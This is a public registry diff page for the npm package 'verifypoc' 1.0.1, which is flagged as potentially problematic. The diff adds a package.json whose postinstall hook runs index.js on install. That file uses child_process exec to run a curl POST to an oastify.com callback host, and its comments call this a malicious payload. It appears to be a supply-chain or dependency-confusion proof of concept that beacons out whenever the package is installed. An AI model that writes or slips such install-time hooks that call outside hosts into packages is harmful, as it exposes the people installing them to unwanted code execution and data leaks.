verifypoc 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of verifypoc might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +13 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require('child_process');
2
+
3
+ // Simulate a malicious payload
4
+ exec('curl -X POST https://bt8gfnzeluynnlhncx8fbumn9ef53xrm.oastify.com --data "malicious=true"', (error, stdout, stderr) => {
5
+ if (error) {
6
+ console.error(`Error executing malicious payload: ${error}`);
7
+ return;
8
+ }
9
+ console.log(`Malicious payload executed: ${stdout}`);
10
+ });
11
+
12
+ module.exports = 'This is the malicious version of verifypoc';
13
+
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "verifypoc",
3
+ "version": "1.0.1",
4
+ "description": "Malicious version of verifypoc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC"
12
+ }